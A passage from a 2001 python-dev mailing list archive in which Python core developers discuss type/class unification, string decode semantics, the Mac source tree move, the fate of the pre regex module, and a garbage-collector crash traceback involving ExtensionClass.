proxy) and no settable attributes. I will > probably give types settable attributes in a next revision, but I > prefer not to make the type's dict writable -- I need to be able to > watch the setattr calls so that if someone changes > DictType.__getitem__ I can change the mp_subscript to a C function > that calls the __getitem__ method. I'm happy to have you look and see if I'm setting something magical. But if I'm not, I would like you to just add the thing I made to an internal private dictionary and remember it. I think that's what you are talking about. >... > If you're talking about *instances*: instances of subtypes of built-in > types have a dict of their own to which you can add stuff to your > heart's content. Instances of built-in types will continue not to > have a dict (it would cost too much space if *every* object had a > dict, even if it was a NULL pointer when no attrs are defined). Darn. That *is* what I was hoping for. There is an implementation that is slowish if you use it, but has little cost if you don't: keep a big dict mapping object pointers to their associated dictionaries (if any). For purposes of discussion, call it sys._associations. Then have the getattr on "PyObject" look in this dict of dicts for attributes that it can't otherwise find, and setattr construct dictionaries in the dict of dicts if necessary. That's the usual workaround anyhow so this would be a nicer syntax and a more orthoganal model. Price: a hasattr that would return false or getattr that would raise AttributeError would be a little slower. They would have to check the dictionary of dictionaries before deciding that they really don't have the attribute. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido at digicool.com Fri May 11 03:57:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 20:57:36 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST." <3AFB31C3.5CEF9064@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com> > > Good point. Plain old types currently (in the descr-branch) have a > > readonly dict (using a proxy) and no settable attributes. I will > > probably give types settable attributes in a next revision, but I > > prefer not to make the type's dict writable -- I need to be able to > > watch the setattr calls so that if someone changes > > DictType.__getitem__ I can change the mp_subscript to a C function > > that calls the __getitem__ method. > > I'm happy to have you look and see if I'm setting something magical. But > if I'm not, I would like you to just add the thing I made to an internal > private dictionary and remember it. I think that's what you are talking > about. OK, we agree on this one. > >... > > If you're talking about *instances*: instances of subtypes of built-in > > types have a dict of their own to which you can add stuff to your > > heart's content. Instances of built-in types will continue not to > > have a dict (it would cost too much space if *every* object had a > > dict, even if it was a NULL pointer when no attrs are defined). > > Darn. That *is* what I was hoping for. > > There is an implementation that is slowish if you use it, but has little > cost if you don't: keep a big dict mapping object pointers to their > associated dictionaries (if any). For purposes of discussion, call it > sys._associations. Then have the getattr on "PyObject" look in this dict > of dicts for attributes that it can't otherwise find, and setattr > construct dictionaries in the dict of dicts if necessary. > > That's the usual workaround anyhow so this would be a nicer syntax and a > more orthoganal model. > > Price: a hasattr that would return false or getattr that would raise > AttributeError would be a little slower. They would have to check the > dictionary of dictionaries before deciding that they really don't have > the attribute. Personally, if you want this outrageous implementation, you should be paying for it, not the infrastructure. It feels contrary to Python's treatment of objects. I don't like elaborate workarounds in the implementation like this -- probably because the performance model becomes muddy. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Fri May 11 03:05:11 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 11 May 2001 13:05:11 +1200 (NZST) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com> Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz> Paul Prescod : > Otherwise > they have null pointers that "act as if" they were empty > dictionaries. Actually, they need to act as if they were empty except for a "__dict__" slot which contains another one of these magic things. :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From barry at digicool.com Fri May 11 05:45:38 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 23:45:38 -0400 Subject: [Python-Dev] Interview with Mark Lutz Message-ID: <15099.24674.311472.184935@anthem.wooz.org> Great interview with Mark on the ORA site, linked from /. http://python.oreilly.com/news/python_0501.html -Barry From fredrik at effbot.org Fri May 11 07:57:34 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 07:57:34 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid> barry wrote: > Great interview with Mark on the ORA site, linked from /. > > http://python.oreilly.com/news/python_0501.html you mean that python-devers read slashdot for python news, when you have the daily url: http://www.pythonware.com/daily Cheers /F From thomas at xs4all.net Fri May 11 11:02:26 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 11 May 2001 11:02:26 +0200 Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400 References: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Message-ID: <20010511110226.M16486@xs4all.nl> On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote: [ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets bitten in the derriere ] > This begs the question, though -- should tests that create temp > files check that the files don't already exist, and fail with a more > descriptive error if they do? I'd think so, yes. I'd also suggest nothing uses something as lamenamed as 'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the first account :) How about mmap calls its test-testfile 'test_mmap.foo' ? -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Fri May 11 11:34:25 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:34:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AFBB221.F29BCB9A@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > I've attached the patch. Due to a small reorganisation the patch is > > a little longer -- symmetry has its price at C level too ;-) > > I may be being dense, but can you explain what's going on here: > > ->> u'\u00e3'.encode('latin-1') > '\xe3' > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > Traceback (most recent call last): > File "", line 1, in ? > UnicodeError: ASCII encoding error: ordinal not in range(128) The string.decode() method will try to reuse the Unicode codecs here. To do this, it will have to convert the string to Unicode first and this fails due to the character not being in the ASCII range. > Can you come up with some other example I can use it tomorrow's > python-dev summary? I will add some codecs which make the .decode() method useful next week. The ones I have in mind are base64, hex and some of the other binascii codecs. Also, the ROT13 codec I posted will go into the core as simple example. With those you will be able to write: data.encode('base64').decode('base64') and get back data. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Fri May 11 11:43:14 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 11:43:14 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid> mal wrote: > > I may be being dense, but can you explain what's going on here: > > > > ->> u'\u00e3'.encode('latin-1') > > '\xe3' > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > Traceback (most recent call last): > > File "", line 1, in ? > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > The string.decode() method will try to reuse the Unicode > codecs here. To do this, it will have to convert the string > to Unicode first and this fails due to the character not being > in the ASCII range. can you take that again? shouldn't michael's example be equivalent to: unicode(u"\u00e3".encode("latin-1"), "latin-1") if not, I'd argue that your "decode" design is broken, instead of just buggy... Cheers /F From mal at lemburg.com Fri May 11 11:50:24 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:50:24 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid> Message-ID: <3AFBB5E0.620710C8@lemburg.com> Fredrik Lundh wrote: > > barry wrote: > > > Great interview with Mark on the ORA site, linked from /. > > > > http://python.oreilly.com/news/python_0501.html > > you mean that python-devers read slashdot for python news, > when you have the daily url: > > http://www.pythonware.com/daily I just bought one of those nice machines that can run pippy and was wondering how to get AvantGo (the channel software that comes with it) to synchronize with your daily URL... wouldn't it be possible to setup a channel for this ? The AvantGo channels can be registered at their site (http://www.avantgo.com), but the contents would have to be "mobile friendly"... anyway, just a thought ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 11 12:07:40 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 12:07:40 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> Message-ID: <3AFBB9EC.F75C158D@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > > I may be being dense, but can you explain what's going on here: > > > > > > ->> u'\u00e3'.encode('latin-1') > > > '\xe3' > > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > > Traceback (most recent call last): > > > File "", line 1, in ? > > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > > > The string.decode() method will try to reuse the Unicode > > codecs here. To do this, it will have to convert the string > > to Unicode first and this fails due to the character not being > > in the ASCII range. > > can you take that again? shouldn't michael's example be > equivalent to: > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > if not, I'd argue that your "decode" design is broken, instead > of just buggy... Well, it is sort of broken, I agree. The reason is that PyString_Encode() and PyString_Decode() guarantee the returned object to be a string object. To be able to reuse Unicode codecs I added code which converts Unicode back to a string in case the codec return an Unicode object (which the .decode() method does). This is what's failing. Perhaps I should simply remove the restriction and have both APIs return the codec's return object as-is ?! (I would be in favour of this, but I'm not sure whether this is already in use by someone...) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 11 15:31:18 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 08:31:18 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST." <200105110157.UAA03123@cj20424-a.reston1.va.home.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> <200105110157.UAA03123@cj20424-a.reston1.va.home.com> Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> > > > Good point. Plain old types currently (in the descr-branch) have a > > > readonly dict (using a proxy) and no settable attributes. I will > > > probably give types settable attributes in a next revision, but I > > > prefer not to make the type's dict writable -- I need to be able to > > > watch the setattr calls so that if someone changes > > > DictType.__getitem__ I can change the mp_subscript to a C function > > > that calls the __getitem__ method. Alas, I think I'll have to withdraw this promise for now. The truly built-in types are static objects that are shared between all interpreter instances within one process, and each type has only one dictionary pointer. So changes to the __dict__ would affect other interpreter instances, and that's unacceptable. I've thought about alternatives; I can't give each interpreter its own set of types because sometimes objects are shared between interpreters (e.g. the dictionary of interned strings), and then then their types have to be shared too! Not having any object sharing would mean too much of a change to the foundations of the implementation. I think we'll have to live with this restriction until Python 3000. Personally, I don't mind -- I see mostly possible abuses for the ability to change attributes of e.g. DictType or StringType. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g at Virginia.EDU Fri May 11 15:43:32 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 09:43:32 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> Message-ID: Catching up on this thread -- mostly because it looks like I'm going to have to use ExtensionClass to make pyobjc classes into python classes rather than types -- you can add that to the lisp of real world uses of Don's Metaclass hack that Tim questioned. Reading up on MetaClasses in Smalltalk again makes me appreciate the simplicity of a prototype system where everything is just an object -- all objects can be cloned, and some objects are only used for cloning -- they are the exemplars of their type which fill the role of Classes. Unfortunately, although prototypes would be a lot simpler, it would be a pretty incompatible change for Python -- I can't think of any way to get there without a lot of breakage. (Still -- I wonder if there's a way they could be used under the covers in the implementation to make it simpler. Prototype semantics are basically a superset of Class based semantics, which is how it was easy to do Smalltalk in Self.) Classes are necessary for statically typed O-O languages, but IMHO, make a lot less sense for dynamic languages. If Py3K were to be a clean start, I'ld urge basing it on prototypes, but as an incremental creation -- I don't know how to get there from here (unless it could sneak in under the implementation covers!) BTW: XlispStat, which has a prototype object system with multiple inheritence also doesn't have "super" -- there is a (call-next-method [ args... ]) function/macro which searches for the base classes. I'm sure there's a lower level function to just get the next method, but typically, call-next-method is what's used. There is no search for non-method attributes, as all of the base class instance vars are merged and made into slots of the instance itself. ( There's no class variables -- there's no classes.) The closest python equivalent would be, as has been discussed in this thread, a super method or function that does attribute lookup on the bases. -- Steve Majewski From nas at python.ca Fri May 11 16:06:39 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 11 May 2001 07:06:39 -0700 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: ; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700 References: Message-ID: <20010511070639.A1402@glacier.fnational.com> noreply at sourceforge.net wrote: > Module objects currently don't define the tp_getattro > or tp_setattro slots. As a result, interning of > attribute names does them no good: a char* is always > passed, so the dict lookup always needs to do a string > compare despite that the attribute name is interned. I think this is a problem in classobject.c:generic_binary_op as well. PyObject_GetAttrString is always used. I believe the old code interned names like "__add__" and used PyObject_GetAttr. Is it worth fixing this? Neil From guido at digicool.com Fri May 11 17:13:56 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 10:13:56 -0500 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST." <20010511070639.A1402@glacier.fnational.com> References: <20010511070639.A1402@glacier.fnational.com> Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com> > I think this is a problem in classobject.c:generic_binary_op as > well. PyObject_GetAttrString is always used. I believe the old > code interned names like "__add__" and used PyObject_GetAttr. Is > it worth fixing this? Maybe. I'd give this low priority. If my descriptor branch work goes well, most of classobject.c *may* disappear in favor of the newly swollen typeobject.c. ;-) --Guido van Rossum (home page: http://www.python.org/~guido/) From jack at oratrix.nl Fri May 11 16:29:24 2001 From: jack at oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:29:24 +0200 Subject: [Python-Dev] Mac CVS repository moved to sourceforge Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl> Folks, the Python/Mac repository has been moved to sourceforge, and is integrated with the general Python repository, so from now on a single CVS tree suficces to build MacPython. I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more weeks and then it'll disappear. Note that the pythoncvs.oratrix.nl repository is still the source for some of the optional libraries you need to build MacPython, but that's only if you want to build it completely from CVS. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From martin at loewis.home.cs.tu-berlin.de Fri May 11 16:41:33 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 11 May 2001 16:41:33 +0200 Subject: [Python-Dev] Mac hierarchy backwards Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> First, thanks to Jack Jansen for integrating the Mac sources; this is a good thing. It seems, however, that some of the directory structure is backwards: Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There may be others of this kind. I also wonder whether all these files are still needed, and meant to be distributed. E.g. I see chdir.c having the comment /* Chdir for the Macintosh. Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). Pathnames must be Macintosh paths, with colons as separators. */ Is it really the case that the Mac API hasn't grown a chdir call in 13 years? Regards, Martin From fdrake at acm.org Fri May 11 16:55:33 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 10:55:33 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Martin v. Loewis writes: > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. I agree that this should be the goal; I don't know if Jack's release procedure would need to be revised before that can happen. If so, I'd encourage him to do so. > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Yikes! I just search developer.apple.com for "chdir" and came up with no hits, but I really don't know just what that tells me. chdir() is required for POSIX compliance, but it isn't mentioned in the C9X final committee draft. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From jack at oratrix.nl Fri May 11 16:56:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:56:39 +0200 Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: Message by "Martin v. Loewis" , Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl> > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. Yes, now that the Mac stuff is integrated with the mainstream again this might be a good idea. > I also wonder whether all these files are still needed, and meant to > be distributed. E.g. I see chdir.c having the comment > > /* Chdir for the Macintosh. > Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). > Pathnames must be Macintosh paths, with colons as separators. */ > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Hmm, hmm, I'm unsure. MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current directories (by design. Whether I agree with the design is a different matter:-). Normally MacPython is built with a special unix-compatibility library, GUSI, which does provide these calls. However, it is still possible to build without GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in it's MacOS API model") I've used these compatibility routines again, until I finally got GUSI ported. But its easy enough to cvs-remove them from the normal tree, to be revived when needed. What do people think? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From pedroni at inf.ethz.ch Fri May 11 16:56:48 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST) Subject: [Python-Dev] Type/class Message-ID: <200105111456.QAA00228@core.inf.ethz.ch> Hi. > > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > I agree, I often read that Smalltalk is "simple" up to metaclasses, on the other hand the casual user can just ignore them. > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) > [Ignoring the fact that code and changes require coders] Thinking in terms of proto-objects, parent slots and list parent slots: python instance I have data slots and a parent slot __class__, python classe G have data slots and a list parent slot __bases__, then we have the python rules (not very uniforms): function from I directly => function function from I.__class__ => bound method function from C => unbound method That's the difficult part for every model that aims to remain compatible. Samuele Pedroni. From thomas.heller at ion-tof.com Fri May 11 17:40:10 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Fri, 11 May 2001 17:40:10 +0200 Subject: [Python-Dev] Type/class References: Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) I never looked at Self or other prototype based systems. Is it really true that prototypes are a lot simpler than metaclasses, but on the other hand more powerful? The 'brain exploding properties' of metaclasses are IMO only there because my brain cannot think easily in too many recursion steps... Thomas From fdrake at acm.org Fri May 11 18:25:54 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 12:25:54 -0400 (EDT) Subject: [Python-Dev] status of pre? Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Have we formulated a plan of action regarding PCRE and the pre module? Are we planning to leave them in for another version, or is SRE considered sufficiently stable? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From sdm7g at Virginia.EDU Fri May 11 18:29:30 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 12:29:30 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Message-ID: On Fri, 11 May 2001, Fred L. Drake, Jr. wrote: > > Martin v. Loewis writes: > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > > years? > > Yikes! I just search developer.apple.com for "chdir" and came up > with no hits, but I really don't know just what that tells me. > chdir() is required for POSIX compliance, but it isn't mentioned in > the C9X final committee draft. There isn't a chdir in any of the pre-OSX Mac *system* libraries, and Mac has never claimed any POSIX compliance (even with OSX, they have officially said it's almost certainly POSIX compliant but they have no plans for now to got thru the hoops and paperwork to get it certified.) chdir is in unistd.h, which isn't part of the standard C library. However, Metrowerks *compiler* and IDE for the Mac does include in MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW selling development tools obviously has more interest in being POSIX compliant than Apple! ) I don't know if there's one in the MPW libraries, so maybe you still want to leave it there. -- Steve Majewski From guido at digicool.com Fri May 11 20:47:38 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 13:47:38 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400." <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com> > Have we formulated a plan of action regarding PCRE and the pre > module? Are we planning to leave them in for another version, or is > SRE considered sufficiently stable? Hm. It should disappear but I believe I've heard people say they were focred to use it because of the recursion limit problems with SRE on some platforms. We could put a warning on using pre or pcre in 2.2, and remove it in 2.3, hoping that /F fixes the recursion limit problems in the mean time (weren't those related to the backtracking implementation)? --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Fri May 11 22:41:30 2001 From: skip at pobox.com (skip at pobox.com) Date: Fri, 11 May 2001 15:41:30 -0500 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <15100.20090.573866.569667@beluga.mojam.com> Has anyone investigated interactions between ExtensionClass objects and GC? I've encountered segfaults with 2.1 in certain situations when using the latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two intersect somewhere. PyGtk provides a Python interface to the Gtk widget get using ExtensionClasses. Any ideas how I should approach the problem? I don't know either piece of code at all and the code that generates the segfault isn't particularly small, not to mention which it uses the bleeding edge Gtk stuff (which I doubt anyone on this list will have installed) and a version of ExtensionClass patched by James Henstridge, the PyGtk author. Here's what I know: 1. Disabling gc gets rid of the segfault 2. I only see the problem with importing a specific module that subclasses the GtkTextView widget from the Python command line. If I run it as a script from the shell prompt, I get no segfault. 3. If I first import the gtk module, then import my module, I get no segfault. 4. Most changes I make to the module causing the problem cause the problemm to disappear. All told, all this really tells me is I'm probably dealing with a malloc/free problem of some sort. Neil and/or Jim (and/or anyone else willing to look into this problem), I can give you access to my development machine via ssh if you think that would help debug the problem. Skip #0 0x0807163d in visit_decref (op=0x4034ece0, data=0x0) at ../Modules/gcmodule.c:153 #1 0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 , arg=0x0) at ../Objects/tupleobject.c:366 #2 0x08071672 in subtract_refs (containers=0x80b8ac0) at ../Modules/gcmodule.c:167 #3 0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc) at ../Modules/gcmodule.c:379 #4 0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484 #5 0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507 #6 0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149 #7 0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244 #8 0x401f0979 in initializeBaseExtensionClass (self=0x4034d320) at ExtensionClass.c:1485 #9 0x401f6774 in export_subclassed_type (dict=0x82d33a4, name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4) at ExtensionClass.c:3410 #10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, class_name=0x40337c55 "GtkTreeViewColumn", get_type=0x404c4080 , ec=0x4034d320, bases=0x82ea9a4) at gobjectmodule.c:202 #11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071 #12 0x402f0ed0 in init_gtk () at gtkmodule.c:98 #13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52 #14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", type=3) at ../Python/import.c:1296 #15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815 #16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc) at ../Python/import.c:1671 #17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522 #18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1563 #19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124) at ../Python/bltinmodule.c:31 #20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2838 #21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2801 #22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734 #23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c) at ../Python/ceval.c:346 #25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", co=0x82910d0, pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490 #26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754 #27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", type=1) at ../Python/import.c:1287 #28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk") at ../Python/import.c:811 #29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5) at ../Python/import.c:1310 #30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815 #31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac) at ../Python/import.c:1671 #32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522 #33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1563 #34 0x0809f4b9 in 